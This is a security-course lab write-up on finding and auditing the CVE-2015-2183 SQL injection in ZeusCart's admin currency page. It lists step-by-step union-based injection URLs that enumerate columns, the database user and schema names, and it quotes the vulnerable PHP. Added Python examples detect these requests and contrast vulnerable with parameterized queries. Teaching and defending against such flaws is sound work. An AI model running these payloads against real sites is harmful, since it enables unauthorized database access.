Experiment 8: CVE-2015-2183 SQL injection vulnerability discovery

Author: ZERO-A-ONE

Date: 2020-12-16

1. Purpose of the experiment

Audit the source code to determine whether the target host has a SQL injection vulnerability.

2. Experimental principle

SQL injection exploits a web application in which data and code are not strictly separated and user input is not subjected to strict escaping, filtering and type checking. An attacker injects a carefully constructed SQL command into the input, and the back-end database engine executes it. The consequences include leakage of database information, defacement of the website, tampering with the database administrator account, and compromise of the server through installation of a backdoor for remote control.

3. Experimental environment

  • Open the [CVE Vulnerability Instance Explanation] course in the [SimpleSPC Information Security Cloud Experimental System] and select the [CVE-2015-2183 zeu] experimental project

  • Attacker: Win7 (IP address: 192.168.1.2); target host: Win 2008 (IP address: 192.168.1.3)

4. Experimental steps

1. Visit http://192.168.1.3/admin/ and log in with the account admin and password admin888. The login page is as follows:

2. Visit http://192.168.1.3/admin/?Do=editcurrency&cid=1. The result is as follows:

3. Visit http://192.168.1.3/admin/?Do=editcurrency&cid=1' (the trailing ' is a single quotation mark). The page is found to differ from the page in step 2, as shown in the screenshot below, so it is judged that the target website has a SQL injection vulnerability.

4. Visit http://192.168.1.3/admin/?Do=editcurrency&cid=1+order+by+5++. The page is found to be normal. The screenshot is as follows:

5. Visit http://192.168.1.3/admin/?Do=editcurrency&cid=1+order+by+6++. The page is found to differ from step 4, indicating that the current query selects 5 fields. The screenshot is as follows:

6. Visit http://192.168.1.3/admin/?Do=editcurrency&cid=1+union+select+1,2,3,4,5++. Columns 2 and 4 are found to be echoed. The screenshot is as follows:

7. Visit http://192.168.1.3/admin/?Do=editcurrency&cid=1+union+select+1,user(),5++ to query the current user and version. The screenshot is shown below:

8. Visit http://192.168.1.3/admin/?Do=editcurrency&cid=1+union+select+1,group_concat(schema_name),3,4,5+from+information_schema.schemata++ to query all current databases. The screenshot is as follows:

9. Audit the source code of CCurrencySettings.php in c:\phpStudy\WWW\admin\classes\Core\Settings\ and Query.php in c:\phpStudy\WWW\Bin\.
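As an added example (not part of the original write-up or of ZeusCart), a small Python log audit that flags the kind of editcurrency requests made in steps 3 to 8 in a web-server access log: every request to /admin/ with Do=editcurrency whose cid is not a plain integer is reported, which is exactly the property the server-side handler should enforce. The log lines are constructed to mirror the steps above and are not real traffic.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines modelled on the requests in steps 2 to 8 (not real traffic)
SAMPLE_LOG = """\
192.168.1.2 - - [16/Dec/2020:10:01:02 +0800] "GET /admin/?Do=editcurrency&cid=1 HTTP/1.1" 200 5120
192.168.1.2 - - [16/Dec/2020:10:01:09 +0800] "GET /admin/?Do=editcurrency&cid=1' HTTP/1.1" 200 3071
192.168.1.2 - - [16/Dec/2020:10:01:31 +0800] "GET /admin/?Do=editcurrency&cid=1+order+by+6+--+ HTTP/1.1" 200 3071
192.168.1.2 - - [16/Dec/2020:10:02:05 +0800] "GET /admin/?Do=editcurrency&cid=1+union+select+1,group_concat(schema_name),3,4,5+from+information_schema.schemata+--+ HTTP/1.1" 200 5388
192.168.1.2 - - [16/Dec/2020:10:02:40 +0800] "GET /admin/?Do=editcurrency&cid=2 HTTP/1.1" 200 5120
"""

# Common log format: client, identity, user, [timestamp], "METHOD URL PROTO", status, bytes
_REQ = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d+)')
_SQL_HINT = re.compile(r"(?i)\b(union\s+select|order\s+by|information_schema|group_concat)\b")

def audit_cid(log_text):
    """Return (ip, timestamp, decoded cid, reason) for each editcurrency request whose
    cid is not a plain integer, which is the only value the handler should ever accept."""
    findings = []
    for line in log_text.splitlines():
        m = _REQ.match(line)
        if not m:
            continue
        parts = urlsplit(m["url"])
        qs = parse_qs(parts.query, keep_blank_values=True)   # decodes '+' to a space
        if parts.path != "/admin/" or qs.get("Do") != ["editcurrency"]:
            continue
        for cid in qs.get("cid", []):
            if re.fullmatch(r"[0-9]+", cid):
                continue
            reason = "SQL keywords in cid" if _SQL_HINT.search(cid) else "non-integer cid"
            findings.append((m["ip"], m["ts"], cid, reason))
    return findings

if __name__ == "__main__":
    for finding in audit_cid(SAMPLE_LOG):
        print(finding)
```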

5. Experimental reflection

1. Based on your reading of the CCurrencySettings.php and Query.php source code in step 9, write out the SELECT statements generated by the showEditCurrency function in steps 3 to 8.

Source code analysis:

function showEditCurrency($Err)
{
	// Country and currency-code lists for the edit form; these queries contain no user input
	$sqlCat="SELECT * FROM country_table ORDER BY cou_name";
	$queryCat = new Bin_Query();
	$queryCat->executeQuery($sqlCat);
	$sqlCat1="SELECT * FROM currency_codes_table ORDER BY currency_name";
	$queryCat1 = new Bin_Query();
	$queryCat1->executeQuery($sqlCat1);
	if(isset($_GET['cid']))
	{
		// cid is only trimmed: no integer cast, no escaping, no type check
		$currencyid=trim($_GET['cid']);
		// the raw value is interpolated straight into the WHERE clause (injection point)
		$sql="select id as hidecurrencyid,currency_name,currency_code,currency_tocken,status from currency_master_table where id=$currencyid";
		$qry = new Bin_Query();
		// executeQuery() is called without $fields, so makeQuery() is never applied to this statement
		$qry->executeQuery($sql);

		return Display_DCurrencySettings::showEditCurrency($queryCat->records,$queryCat1->records,$qry->records,$Err);
	}
	else
		return '<div class="alert alert-error">
			<button type="button" class="close" data-dismiss="alert">×</button> No more currency.</div>';
}

Thus the SQL statement that is actually executed at the end is:

select id as hidecurrencyid,currency_name,currency_code,currency_tocken,status from currency_master_table where id=$currencyid

Reading the source further, we find:

$currencyid=trim($_GET['cid']);
$sql="select id as hidecurrencyid,currency_name,currency_code,currency_tocken,status from currency_master_table where id=$currencyid";

The cid parameter we enter becomes $currencyid and is placed directly into the statement.

Step 3:

http://192.168.1.3/admin/?Do=editcurrency&cid=1'

The executed SQL statement is:

select id as hidecurrencyid,currency_name,currency_code,currency_tocken,status from currency_master_table where id=1'

Vulnerability discovery: the trailing quote makes the statement syntactically invalid, so its execution fails and the execution result is returned as a Boolean value (false) rather than a record. Because the page differs from the previous page, the server evidently passed our input to the database and executed it as part of the SQL query, so we can conclude that a SQL injection vulnerability exists.

Step 4:

http://192.168.1.3/admin/?Do=editcurrency&cid=1+order+by+5+--+

The executed SQL statement is:

select id as hidecurrencyid,currency_name,currency_code,currency_tocken,status from currency_master_table where id=1+order+by+5+--+

Step 5:

http://192.168.1.3/admin/?Do=editcurrency&cid=1+order+by+6+--+

The executed SQL statement is:

select id as hidecurrencyid,currency_name,currency_code,currency_tocken,status from currency_master_table where id=1+order+by+6+--+

Step 6:

http://192.168.1.3/admin/?Do=editcurrency&cid=1+union+select+1,2,3,4,5++

The executed SQL statement is:

select id as hidecurrencyid,currency_name,currency_code,currency_tocken,status from currency_master_table where id=1+union+select+1,2,3,4,5++

Step 7:

http://192.168.1.3/admin/?Do=editcurrency&cid=1+union+select+1,user(),5+--+

The executed SQL statement is:

select id as hidecurrencyid,currency_name,currency_code,currency_tocken,status from currency_master_table where id=1+union+select+1,user(),5+--+

Step 8:

http://192.168.1.3/admin/?Do=editcurrency&cid=1+union+select+1,group_concat(schema_name),3,4,5+from+information_schema.schemata+--+

The executed SQL statement is:

select id as hidecurrencyid,currency_name,currency_code,currency_tocken,status from currency_master_table where id=1+union+select+1,group_concat(schema_name),3,4,5+from+information_schema.schemata+--+

2. The page displays of step 4 and step 5 are different. What do you think the reason may be?

Reason: the currency_master_table table has 5 fields.

First look at the query statements of steps 4 and 5:

Step 4:

select id as hidecurrencyid,currency_name,currency_code,currency_tocken,status from currency_master_table where id=1+order+by+5+--+

Step 5:

select id as hidecurrencyid,currency_name,currency_code,currency_tocken,status from currency_master_table where id=1+order+by+6+--+

The reason is that ORDER BY is used to determine the number of fields: try ORDER BY n, then n+1, and keep increasing n until an error page appears. Here the query still executes correctly at 5, but when n reaches 6 it exceeds the number of fields in the table query, so the two pages differ, that is, an error has occurred. Hence the number of fields in the table is 5.

3. Only 2 and 4 are displayed in step 6. What do you think the reason may be?

Reason: the display positions of the web page are 2 and 4; the page only has the two "windows" 2 and 4 open.

First look at the SQL statement of step 6:

select id as hidecurrencyid,currency_name,currency_code,currency_tocken,status from currency_master_table where id=1+union+select+1,2,3,4,5++

The UNION operator combines the result sets of two or more SELECT statements.

This is the usual way of determining the display positions in a SQL injection with echo; a display position is a column of the result whose data is actually rendered in the web page.

id=1+union+select+1,2,3,4,5++

Only 2 and 4 are displayed, so the web page can only show the information in the second and fourth columns of the result and cannot show the other columns. Think of it as the web page having only two windows open, 2 and 4: any database information must pass through one of these windows to be seen. So if we want to know the value of some attribute, for example admin, we must place that attribute in position 2 or 4 so that its value is exposed through the second or fourth column.

4. (Optional) Why does the target website have a SQL injection vulnerability? Answer according to your audit of the Query.php code.

function executeQuery($sql, $fields = array())
{
	//if(substr_count($sql,'#')!=count($fields))
		//return false;
	// Placeholder substitution via makeQuery() only happens when $fields is supplied;
	// showEditCurrency passes a fully built $sql string and no $fields, so this branch is skipped
	if(count($fields)>0)
		$sql = $this->makeQuery($sql,$fields);	// Security::makeQuery();

	$i=0;
	// the statement is sent to MySQL exactly as received
	$this->rs = mysql_query($sql);
	$this->sql = $sql;
	$this->insertid = mysql_insert_id();

	if(is_resource($this->rs))
		$this->totrows = mysql_num_rows($this->rs);

	// a failed statement (for example a syntax error caused by a stray quote) ends here with false
	if(!mysql_affected_rows() || $this->totrows < 1)
		return false;
	else
	{
		while($fetch = mysql_fetch_array($this->rs))
			$this->records[$i++] = $fetch;

		// drop the numeric keys that mysql_fetch_array returns alongside the column names
		for($i=0;$i<count($this->records);$i++)
		{
			foreach ($this->records[$i] as $key=>$item)
			{
				if(is_numeric($key))
					unset($this->records[$i][$key]);
			}
		}
		return true;
	}
}

Reason: executeQuery performs no check at all on the cid parameter and fully trusts the user's cid input, which leads to the SQL injection vulnerability.
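As an added example (not code from ZeusCart or from the original write-up), the query construction of showEditCurrency reproduced in Python against an in-memory SQLite copy of currency_master_table with the same five columns, next to a hardened version that validates cid as an integer and binds it as a parameter. The table rows are constructed, and SQLite stands in for MySQL, so user() and information_schema from steps 7 and 8 are not available here.

```python
import re
import sqlite3

# Constructed stand-in for currency_master_table with the five columns named in
# showEditCurrency; SQLite is used here in place of MySQL and the rows are made up.
_DDL = """
CREATE TABLE currency_master_table (
    id INTEGER PRIMARY KEY, currency_name TEXT, currency_code TEXT,
    currency_tocken TEXT, status INTEGER);
INSERT INTO currency_master_table VALUES
    (1, 'US Dollar', 'USD', '$', 1), (2, 'Euro', 'EUR', 'E', 1);
"""
_SELECT = ("select id as hidecurrencyid,currency_name,currency_code,"
           "currency_tocken,status from currency_master_table where id=")

def _db():
    con = sqlite3.connect(":memory:")
    con.executescript(_DDL)
    return con

def vulnerable_query(cid):
    """Mirror of $sql="... where id=$currencyid": the trimmed cid is pasted into
    the statement as text, so any SQL syntax it contains is executed."""
    try:
        return _db().execute(_SELECT + cid.strip()).fetchall()
    except sqlite3.Error as exc:
        # executeQuery() returns false here; that is the 'different page' of step 3
        return "ERROR: " + str(exc)

def safe_query(cid):
    """Hardened form: accept only ASCII digits, then bind the integer as a
    parameter so the value can never alter the structure of the statement."""
    cid = cid.strip()
    if not re.fullmatch(r"[0-9]+", cid):
        raise ValueError("cid must be a positive integer")
    return _db().execute(_SELECT + "?", (int(cid),)).fetchall()

def is_rejected(cid):
    """True when the hardened handler refuses the input before it reaches SQL."""
    try:
        safe_query(cid)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    for payload in ("1", "1'", "1 order by 5 -- ", "1 order by 6 -- ",
                    "1 union select 1,2,3,4,5 -- "):
        print(repr(payload), "->", vulnerable_query(payload),
              "| rejected by safe_query:", is_rejected(payload))
```

The ORDER BY 5 / ORDER BY 6 pair and the UNION row reproduce the behaviour seen in steps 4 to 6, while the hardened handler refuses every one of those inputs.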

Summary:

ZeusCart is an open source shopping system for small and medium-sized online shops, based on PHP and MySQL. There is a SQL injection vulnerability in the management backend of ZeusCart 4, caused by the admin/ URI not sufficiently filtering the 'id' parameter in the dispatchdetail and subadminmgtedit operations and not sufficiently filtering the 'cid' parameter in the editcurrency operation. Remote attackers can use this vulnerability to execute arbitrary SQL commands.


Source: blog.csdn.net/kelxLZ/article/details/111286140